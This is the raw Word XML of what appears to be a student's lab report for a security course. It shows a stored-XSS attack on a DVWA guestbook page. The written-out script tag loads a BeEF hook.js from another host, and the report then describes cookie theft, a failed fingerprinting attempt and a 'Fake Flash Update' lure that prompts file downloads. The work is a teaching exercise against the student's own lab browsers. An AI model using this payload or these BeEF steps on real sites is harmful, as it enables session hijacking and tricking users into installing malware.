        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524EC804" w14:textId="77777777" w:rsidR="00DD715E" w:rsidRDefault="00DD715E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="582A2671" w14:textId="42A86C47" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Alert screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC2DCE" w14:textId="0EB8AF8F" w:rsidR="004D4151" w:rsidRPr="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4151">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E33B027" wp14:editId="7FF9B2A3">
            <wp:extent cx="2715004" cy="1743318"/>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15004" cy="1743318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0073F00F" w14:textId="5C2C5D88" w:rsidR="00586CB5" w:rsidRDefault="00586CB5" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D0598" w14:textId="41FC276A" w:rsidR="00586CB5" w:rsidRDefault="00586CB5" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526F07A9" w14:textId="5978D3A4" w:rsidR="000F5C7B" w:rsidRDefault="000F5C7B" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PHP code for </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidRPr="00A33977">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://comp4108.ca:9999/dvwa/vulnerabilities/xss_s/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5C3131" w14:textId="0A86676E" w:rsidR="000F5C7B" w:rsidRDefault="000F5C7B" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="000F5C7B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C7B2B29" wp14:editId="0F675722">
            <wp:extent cx="5943600" cy="31375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137535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="613AA3A7" w14:textId="1B495430" w:rsidR="000F5C7B" w:rsidRDefault="000F5C7B" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672F702E" w14:textId="31A2C8A7" w:rsidR="000F5C7B" w:rsidRDefault="00AB2BEB" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>This code takes the name and message entered by the user and inserts it into the guestbook SQL table. Some code elsewhere updates the webpage DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF86C42" w14:textId="715E05A7" w:rsidR="00AB2BEB" w:rsidRDefault="00AB2BEB" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD0914D" w14:textId="77777777" w:rsidR="0018253E" w:rsidRDefault="00AB2BEB" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I exploited the lack of protection against XSS attacks by entering “foo” as the name and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E71FF77" w14:textId="77777777" w:rsidR="00EA6DB0" w:rsidRDefault="00AB2BEB" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00E14996" w:rsidRPr="00E14996">
        <w:t xml:space="preserve">&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E14996" w:rsidRPr="00E14996">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E14996" w:rsidRPr="00E14996">
        <w:t>="comp4108.ca:3000/hook.js" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>” as the message</w:t>
      </w:r>
      <w:r w:rsidR="00EA6DB0">
        <w:t>, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A740AD5" w14:textId="77777777" w:rsidR="00EA6DB0" w:rsidRDefault="00EA6DB0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA6DB0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="539A484C" wp14:editId="52112696">
            <wp:extent cx="3244132" cy="98683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85837" cy="999517"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20A627" w14:textId="77777777" w:rsidR="00EA6DB0" w:rsidRDefault="00EA6DB0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0BC42A" w14:textId="329E20E8" w:rsidR="00AB2BEB" w:rsidRDefault="00EA6DB0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Since the message is embedded directly into the page, my </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6DB0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tag should cause a GET request to retrieve the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6DB0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>hook.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code, and then the JavaScript should be loaded into the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77614130" w14:textId="690ED7A1" w:rsidR="004E0D83" w:rsidRDefault="004E0D83" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C288D68" w14:textId="42217AC3" w:rsidR="00AB2BEB" w:rsidRPr="004E0D83" w:rsidRDefault="004E0D83" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D77FB33" w14:textId="0D083B29" w:rsidR="00AB2BEB" w:rsidRDefault="004E0D83" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I opened </w:t>
      </w:r>
      <w:r w:rsidR="00E918FC">
        <w:t>Firefox to be my victim browser (my attack browser was Google Chrome)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and went to </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidRPr="00310DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://comp4108.ca:9999/dvwa/vulnerabilities/xss_s/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. Once the page had loaded,</w:t>
      </w:r>
      <w:r w:rsidR="00AB2BEB">
        <w:t xml:space="preserve"> I confirmed the DOM was modified as desired using the Firefox Inspector developer tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA319E1" w14:textId="2BB4C3F0" w:rsidR="00AB2BEB" w:rsidRDefault="00A80EA0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A80EA0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="624A017B" wp14:editId="4C27BE1A">
            <wp:extent cx="3210373" cy="905001"/>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10373" cy="905001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CD9585" w14:textId="389A99CE" w:rsidR="00A80EA0" w:rsidRDefault="00A80EA0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0B4104" w14:textId="11718031" w:rsidR="00A80EA0" w:rsidRDefault="00A80EA0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I also confirmed the JavaScript had been loaded by looking in the Debugger tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E3EA7E" w14:textId="0B562C1F" w:rsidR="00E34E8D" w:rsidRDefault="00A80EA0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A80EA0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0940D78E" wp14:editId="179A08F4">
            <wp:extent cx="2876951" cy="27816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76951" cy="2781688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E74C93" w14:textId="1FD22DCD" w:rsidR="00A80EA0" w:rsidRDefault="00A80EA0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D33D189" w14:textId="62326771" w:rsidR="002C585B" w:rsidRPr="002C585B" w:rsidRDefault="002C585B" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260D8830" w14:textId="55F353E8" w:rsidR="00A80EA0" w:rsidRDefault="00A80EA0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I then went to my attack browser’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> control panel and saw </w:t>
      </w:r>
      <w:r w:rsidR="004E0D83">
        <w:t>the victim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> browser had been hooked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3747767D" w14:textId="1745B7E1" w:rsidR="00A80EA0" w:rsidRDefault="00A80EA0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00A80EA0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68ABEC48" wp14:editId="2694732E">
            <wp:extent cx="2133898" cy="73352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33898" cy="733527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EECD4C7" w14:textId="77777777" w:rsidR="00A80EA0" w:rsidRDefault="00A80EA0" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA1E6EB" w14:textId="77F0B436" w:rsidR="002C5263" w:rsidRDefault="004E0D83" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question </w:t>
      </w:r>
      <w:r w:rsidR="002C585B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683E7FCA" w14:textId="52BF533A" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I stole the cookie by executing the “Get Cookie” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command. This is what I got for the cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E8CB3D" w14:textId="7CD95339" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="004B687E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CA7A621" wp14:editId="53F51952">
            <wp:extent cx="5943600" cy="2832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83210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="385ABC40" w14:textId="3F94B60C" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25103997" w14:textId="77777777" w:rsidR="00D86DBC" w:rsidRDefault="00D86DBC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718AE2B" w14:textId="09E4AEBD" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4FF344" w14:textId="77777777" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I attempted to fingerprint my Firefox victim browser using the “Fingerprint Browser” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command. The command failed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37634691" w14:textId="77777777" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="004B687E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B6E7C8F" wp14:editId="28AD2D5A">
            <wp:extent cx="3172268" cy="552527"/>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72268" cy="552527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74848E1E" w14:textId="5B8E8214" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>This was expected, since the command is labelled red in the module tree, as below,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F3C255" w14:textId="36B3CE34" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="004B687E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55D62AC9" wp14:editId="14345529">
            <wp:extent cx="1657581" cy="13336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57581" cy="133369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFA5F3C" w14:textId="305A495F" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>and commands labelled red are commands that do not work against the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F50BB06" w14:textId="1B656354" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="004B687E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="699F983F" wp14:editId="2AA0A7BE">
            <wp:extent cx="4124901" cy="885949"/>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24901" cy="885949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA0523A" w14:textId="707F4433" w:rsidR="00D16C51" w:rsidRDefault="00D16C51" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D683D28" w14:textId="04BDB222" w:rsidR="00D16C51" w:rsidRDefault="00D16C51" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I also tried this with Microsoft Edge, Google Chrome in private browsing mode, and Internet Explorer (all of these browsers were running on Windows 10), but for some reason I was unable to fingerprint the browser with any of them. </w:t>
      </w:r>
      <w:r w:rsidR="00DF138C">
        <w:t>It is possible my Norton Antivirus software might have interfered, though I tried to turn its intrusion detection off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B83416E" w14:textId="05212DB5" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E33691" w14:textId="5418F540" w:rsidR="004B687E" w:rsidRDefault="004B687E" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CD5F0" w14:textId="4815B97D" w:rsidR="00D16C51" w:rsidRDefault="00D16C51" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I executed the “Fake Flash Update” command with the “</w:t>
      </w:r>
      <w:r w:rsidR="00124779">
        <w:t>Custom Payload URI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” argument set to </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:history="1">
        <w:r w:rsidR="00D84B37" w:rsidRPr="00310DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://scx2.b-cdn.net/gfx/news/2018/hack.jpg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D84B37">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D84E92" w14:textId="3036CC2F" w:rsidR="00D16C51" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D84B37">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41440194" wp14:editId="3B910038">
            <wp:extent cx="5943600" cy="15678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567815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3008E239" w14:textId="77777777" w:rsidR="00D16C51" w:rsidRDefault="00D16C51" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53BC8B12" w14:textId="77777777" w:rsidR="00D86DBC" w:rsidRDefault="00D86DBC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C29D8" w14:textId="7A7E20C8" w:rsidR="00D84B37" w:rsidRDefault="00D16C51" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Once the command had executed, a Flash upgrade </w:t>
      </w:r>
      <w:r w:rsidR="00D84B37">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r w:rsidR="00D84B37">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> suddenly appeared </w:t>
      </w:r>
      <w:r w:rsidR="00D84B37">
        <w:t>on the victim browser page (here my victim browser is Google Chrome):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FB92D5" w14:textId="294D55E2" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D84B37">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E48BC2" wp14:editId="6A8A1182">
            <wp:extent cx="5943600" cy="35896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589655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB3B429" w14:textId="77777777" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C856F9D" w14:textId="580E8960" w:rsidR="004B687E" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When I clicked on the Flash upgrade “window”, my browser opened </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidRPr="00310DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://scx2.b-cdn.net/gfx/news/2018/hack.jpg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> in a new tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B909BB" w14:textId="6ABB4977" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D84B37">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DFE37E4" wp14:editId="011AF737">
            <wp:extent cx="5943600" cy="35896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589655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26530C" w14:textId="4296F1A3" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C0D541" w14:textId="1241F8CC" w:rsidR="00124779" w:rsidRDefault="00124779" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I also ran this command again with the default “Custom Payload URI” argument, which caused by browser to automatically download </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r w:rsidRPr="00310DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/beefproject/beef/archive/master.zip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. Therefore, an attacker could use this exploit to trick someone into downloading an executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2001E" w14:textId="77777777" w:rsidR="00124779" w:rsidRDefault="00124779" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58578477" w14:textId="418A4A1A" w:rsidR="00D84B37" w:rsidRDefault="00D84B37" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For this command, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>doesn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> display any command results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B39B6F3" w14:textId="302C4E90" w:rsidR="00D16C51" w:rsidRDefault="00D16C51" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ECEAC53" w14:textId="418D1F2C" w:rsidR="00D16C51" w:rsidRDefault="00D16C51" w:rsidP="00586CB5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
